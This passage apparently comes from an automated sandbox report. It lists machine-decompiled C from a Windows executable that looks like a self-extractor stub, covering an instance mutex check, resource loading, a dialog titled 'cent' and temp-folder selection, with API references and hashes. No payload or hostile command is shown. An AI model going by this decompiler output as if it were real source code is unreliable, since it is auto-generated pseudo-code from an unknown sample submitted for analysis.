                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00322390(0x328a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E003244B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E0032468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x328588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x329a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E003244B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E003244B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x328588);
                                                                                                                                                                                                                                            										 *0x329124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00322cb5
                                                                                                                                                                                                                                            0x00322cbc
                                                                                                                                                                                                                                            0x00322cc7
                                                                                                                                                                                                                                            0x00322cc9
                                                                                                                                                                                                                                            0x00322cd1
                                                                                                                                                                                                                                            0x00322cd3
                                                                                                                                                                                                                                            0x00322cd9
                                                                                                                                                                                                                                            0x00322ce9
                                                                                                                                                                                                                                            0x00322cf9
                                                                                                                                                                                                                                            0x00322d0e
                                                                                                                                                                                                                                            0x00322d15
                                                                                                                                                                                                                                            0x00322d1c
                                                                                                                                                                                                                                            0x00322ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322d2d
                                                                                                                                                                                                                                            0x00322d34
                                                                                                                                                                                                                                            0x00322d3b
                                                                                                                                                                                                                                            0x00322d40
                                                                                                                                                                                                                                            0x00322d48
                                                                                                                                                                                                                                            0x00322d59
                                                                                                                                                                                                                                            0x00322d84
                                                                                                                                                                                                                                            0x00322e1f
                                                                                                                                                                                                                                            0x00322e1f
                                                                                                                                                                                                                                            0x00322e2e
                                                                                                                                                                                                                                            0x00322e41
                                                                                                                                                                                                                                            0x00322e5a
                                                                                                                                                                                                                                            0x00322e62
                                                                                                                                                                                                                                            0x00322e6c
                                                                                                                                                                                                                                            0x00322e6c
                                                                                                                                                                                                                                            0x00322e75
                                                                                                                                                                                                                                            0x00322e77
                                                                                                                                                                                                                                            0x00322e77
                                                                                                                                                                                                                                            0x00322e84
                                                                                                                                                                                                                                            0x00322e8b
                                                                                                                                                                                                                                            0x00322e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e96
                                                                                                                                                                                                                                            0x00322e96
                                                                                                                                                                                                                                            0x00322e9e
                                                                                                                                                                                                                                            0x00322ea2
                                                                                                                                                                                                                                            0x00322eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322ece
                                                                                                                                                                                                                                            0x00322ede
                                                                                                                                                                                                                                            0x00322eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322eed
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322ea2
                                                                                                                                                                                                                                            0x00322e86
                                                                                                                                                                                                                                            0x00322e88
                                                                                                                                                                                                                                            0x00322e88
                                                                                                                                                                                                                                            0x00322e43
                                                                                                                                                                                                                                            0x00322e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e48
                                                                                                                                                                                                                                            0x00322e30
                                                                                                                                                                                                                                            0x00322e30
                                                                                                                                                                                                                                            0x00322ef8
                                                                                                                                                                                                                                            0x00322f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f01
                                                                                                                                                                                                                                            0x00322d8a
                                                                                                                                                                                                                                            0x00322d8f
                                                                                                                                                                                                                                            0x00322da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322da3
                                                                                                                                                                                                                                            0x00322dae
                                                                                                                                                                                                                                            0x00322db4
                                                                                                                                                                                                                                            0x00322dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322dca
                                                                                                                                                                                                                                            0x00322dd3
                                                                                                                                                                                                                                            0x00322df5
                                                                                                                                                                                                                                            0x00322e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322dd5
                                                                                                                                                                                                                                            0x00322dde
                                                                                                                                                                                                                                            0x00322de3
                                                                                                                                                                                                                                            0x00322e04
                                                                                                                                                                                                                                            0x00322e0a
                                                                                                                                                                                                                                            0x00322e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e10
                                                                                                                                                                                                                                            0x00322dd3
                                                                                                                                                                                                                                            0x00322dbb
                                                                                                                                                                                                                                            0x00322da1
                                                                                                                                                                                                                                            0x00322d5b
                                                                                                                                                                                                                                            0x00322d5b
                                                                                                                                                                                                                                            0x00322d5d
                                                                                                                                                                                                                                            0x00322d69
                                                                                                                                                                                                                                            0x00322d6e
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322d59
                                                                                                                                                                                                                                            0x00322f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00322CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00322CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00322CF9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00322D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00322D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00322DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00322DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00322E0A
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                                                            • API String ID: 1002816675-2654900392
                                                                                                                                                                                                                                            • Opcode ID: 8cf33790724bafb0aa42fb5da5227513ea3dfdb49cf7632bc46504c573a83f00
                                                                                                                                                                                                                                            • Instruction ID: dd50be38bbefcaadd788e2779d03cebec251736f5352019ead80cd8428eb3c0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cf33790724bafb0aa42fb5da5227513ea3dfdb49cf7632bc46504c573a83f00
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951E370600331BBE733AB21BD4AB7B369CEB45710F02442EF946D91D5DEB88C42D666
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E003234F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x3291d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x328584 = _t35;
                                                                                                                                                                                                                                            					E003243D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x328184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00324FE0, 0, 0, 0x328798);
                                                                                                                                                                                                                                            					 *0x32879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E003244B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x32858c);
                                                                                                                                                                                                                                            					_t38 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E003244B9(_t38, 0x4b2, 0x321140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x3291d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x32858c);
                                                                                                                                                                                                                                            						_t39 =  *0x32879c; // 0x0
                                                                                                                                                                                                                                            						E00323680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x32858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x32879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x003234fb
                                                                                                                                                                                                                                            0x003234fe
                                                                                                                                                                                                                                            0x00323665
                                                                                                                                                                                                                                            0x00323666
                                                                                                                                                                                                                                            0x00323666
                                                                                                                                                                                                                                            0x00323668
                                                                                                                                                                                                                                            0x0032366e
                                                                                                                                                                                                                                            0x0032366e
                                                                                                                                                                                                                                            0x00323671
                                                                                                                                                                                                                                            0x00323671
                                                                                                                                                                                                                                            0x00323677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323677
                                                                                                                                                                                                                                            0x00323504
                                                                                                                                                                                                                                            0x00323506
                                                                                                                                                                                                                                            0x00323507
                                                                                                                                                                                                                                            0x0032350c
                                                                                                                                                                                                                                            0x0032365b
                                                                                                                                                                                                                                            0x0032365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323661
                                                                                                                                                                                                                                            0x00323512
                                                                                                                                                                                                                                            0x00323515
                                                                                                                                                                                                                                            0x003235be
                                                                                                                                                                                                                                            0x003235c1
                                                                                                                                                                                                                                            0x003235d1
                                                                                                                                                                                                                                            0x003235d8
                                                                                                                                                                                                                                            0x003235de
                                                                                                                                                                                                                                            0x003235f8
                                                                                                                                                                                                                                            0x00323617
                                                                                                                                                                                                                                            0x00323617
                                                                                                                                                                                                                                            0x00323623
                                                                                                                                                                                                                                            0x00323637
                                                                                                                                                                                                                                            0x0032363d
                                                                                                                                                                                                                                            0x00323642
                                                                                                                                                                                                                                            0x00323644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323646
                                                                                                                                                                                                                                            0x00323652
                                                                                                                                                                                                                                            0x00323657
                                                                                                                                                                                                                                            0x00323658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323658
                                                                                                                                                                                                                                            0x00323644
                                                                                                                                                                                                                                            0x0032351b
                                                                                                                                                                                                                                            0x0032351d
                                                                                                                                                                                                                                            0x0032354f
                                                                                                                                                                                                                                            0x00323553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032355f
                                                                                                                                                                                                                                            0x00323565
                                                                                                                                                                                                                                            0x0032357c
                                                                                                                                                                                                                                            0x00323581
                                                                                                                                                                                                                                            0x00323584
                                                                                                                                                                                                                                            0x0032359b
                                                                                                                                                                                                                                            0x003235a1
                                                                                                                                                                                                                                            0x003235a7
                                                                                                                                                                                                                                            0x003235ad
                                                                                                                                                                                                                                            0x003235b3
                                                                                                                                                                                                                                            0x003235b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003235b8
                                                                                                                                                                                                                                            0x00323586
                                                                                                                                                                                                                                            0x00323588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323590
                                                                                                                                                                                                                                            0x00323524
                                                                                                                                                                                                                                            0x00323535
                                                                                                                                                                                                                                            0x00323541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00323535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00323541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 0032355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00321140,00000000,00000020,00000004), ref: 00323590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003235C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 003235F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 003235F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00323610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00323617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00323623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00323637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00323671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 2406144884-3940384054
                                                                                                                                                                                                                                            • Opcode ID: dd96fc28ef8035ae991f597af440d52410ccf7ca3413715ef1f33aba9fe53021
                                                                                                                                                                                                                                            • Instruction ID: 76501b085d5a310539f6fe2409494d206b4d6be14667284c941bf3d9d2a4b469
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd96fc28ef8035ae991f597af440d52410ccf7ca3413715ef1f33aba9fe53021
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431D430240321BBD7331F25FC8DE2B3A6DE786F11F20492DF606952A0CB799A12DB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00324224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E003244B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0x3288c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0x3287a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0x328598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00324200;
                                                                                                                                                                                                                                            					_v28 = 0x3288c0;
                                                                                                                                                                                                                                            					 *0x32a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0x32a288(_t32, 0x3288c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0x3288c0 != 0) {
                                                                                                                                                                                                                                            							E00321680(0x3287a0, 0x104, 0x3288c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x32a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0x3287a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0x3288c0);
                                                                                                                                                                                                                                            					_t61 = 0x3288c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0x3288c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0x3288c0; // 0x651181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0x3288c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0x3288c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00324234
                                                                                                                                                                                                                                            0x0032423c
                                                                                                                                                                                                                                            0x00324240
                                                                                                                                                                                                                                            0x003243b2
                                                                                                                                                                                                                                            0x003243b7
                                                                                                                                                                                                                                            0x003243c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003243c5
                                                                                                                                                                                                                                            0x0032424c
                                                                                                                                                                                                                                            0x00324252
                                                                                                                                                                                                                                            0x00324257
                                                                                                                                                                                                                                            0x003243a4
                                                                                                                                                                                                                                            0x003243a5
                                                                                                                                                                                                                                            0x003243ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003243ab
                                                                                                                                                                                                                                            0x00324263
                                                                                                                                                                                                                                            0x00324269
                                                                                                                                                                                                                                            0x0032426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032427a
                                                                                                                                                                                                                                            0x00324280
                                                                                                                                                                                                                                            0x00324285
                                                                                                                                                                                                                                            0x00000000
